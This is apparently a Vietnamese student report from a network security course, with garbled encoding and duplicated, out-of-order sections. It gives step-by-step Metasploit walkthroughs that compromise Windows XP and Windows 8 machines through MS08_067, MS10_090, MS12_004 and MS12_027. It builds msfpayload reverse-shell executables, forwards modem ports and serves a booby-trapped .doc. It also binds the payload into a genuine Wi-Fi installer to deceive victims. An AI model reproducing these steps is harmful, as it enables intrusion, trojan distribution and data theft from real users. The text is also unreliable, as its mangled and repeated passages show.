Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
